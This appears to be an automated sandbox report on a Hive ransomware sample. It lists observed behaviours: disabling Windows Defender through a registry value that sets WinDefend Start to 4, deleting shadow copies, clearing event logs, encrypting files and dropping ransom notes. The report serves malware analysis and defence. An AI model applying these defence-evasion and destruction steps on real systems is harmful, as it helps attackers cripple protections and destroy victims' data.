Analysis Overview
SHA256
ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8
Threat Level: Known bad
The file ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8 was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
Deletes Windows Defender Definitions
Deletes shadow copies
Clears Windows event logs
Modifies boot configuration data using bcdedit
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious behavior: EnumeratesProcesses
Runs net.exe
Runs ping.exe
Suspicious use of WriteProcessMemory
Opens file in notepad (likely ransom note)
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Interacts with shadow copies
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 13:28
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 13:28
Reported
2022-01-13 13:33
Platform
win7-en-20211208
Max time kernel
182s
Max time network
129s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\ResolveConvertFrom.tiff.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_fhzGWVZrPEk0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SelectAdd.png => C:\Users\Admin\Pictures\SelectAdd.png.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_BGoVhCnicaE0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SelectAdd.png.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_BGoVhCnicaE0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnlockPop.png => C:\Users\Admin\Pictures\UnlockPop.png.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_h03YrvCZTtc0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ResolveConvertFrom.tiff => C:\Users\Admin\Pictures\ResolveConvertFrom.tiff.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_fhzGWVZrPEk0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InvokeClear.crw => C:\Users\Admin\Pictures\InvokeClear.crw.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_rLEeYn4pSwg0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\InvokeClear.crw.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_rLEeYn4pSwg0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WriteConvertFrom.raw => C:\Users\Admin\Pictures\WriteConvertFrom.raw.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_hFn7SKMxt1c0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WriteConvertFrom.raw.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_hFn7SKMxt1c0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnlockPop.png.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_h03YrvCZTtc0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\SPACER.GIF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_puILns9quc00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\TipBand.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_kmiJP-EcQgM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_D5p8OsZkwMg0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Samara.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_zRJzFYSbdLg0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Background_Loading.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_cHkLdwwO-DI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\de-DE\wmlaunch.exe.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\INDUST.ELM.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_dkCSXuHtjm00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_2ug0pTwiALs0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14869_.GIF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_0YQoq9ITvkY0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21480_.GIF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_uqn7WbsCymU0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\ParentMenuButtonIcon.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_5HMMB-vy-G40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_0r5v55SFxY80.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152414.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_8VgXkb0xbWk0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\da.txt.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_id_0jCmA6_M0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fr.txt.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_u_F5MFj0y9w0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_play.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\init.js | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECLIPSE\mpYx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00932_.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_wvbqPW347hc0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\mpYx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_P_KTf1YE2p40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_A-_T1BfQnxE0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153299.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_TGNvSe6lWAs0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\INVITE.XML.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_fUXLrBVpE700.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\msdaorar.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\js\calendar.js | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL110.XML.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_I1ShyBADxys0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_VyTJCQwAG500.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb__mXXmoy9KR00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\js\settings.js | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_SISSdXJyRbw0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00168_.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_cV4dRq6dLlI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\PUSH.WAV.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_ac4QNJLRxzM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\DELIMR.FAE.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_NWnv5430meQ0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\MMHMM.WAV.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_zwQ_oHZN44M0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(inch).wmf | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_fY7s5iREJIM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Seoul.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_YWdZlrOWops0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_h.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101980.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_U20fXsFyciw0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\46.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\notConnectedStateIcon.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-2.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_OhHKwhlXLek0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_iOdvIx1KjII0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00544_.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_x3hhPTU0oYI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\PREVIEW.GIF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_9tJykceIoD40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_ULHQI2Cgy700.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB4.BDR.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_RsFgW9ar3HM0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_mmyWNit62Ic0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_b0GpFQPWjSs0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00367_.WMF.QxErpsA1pseFo7QtfoWxIa8nTEbGNq5aMi3LoC5OVFb_Na4lZYLtmyI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
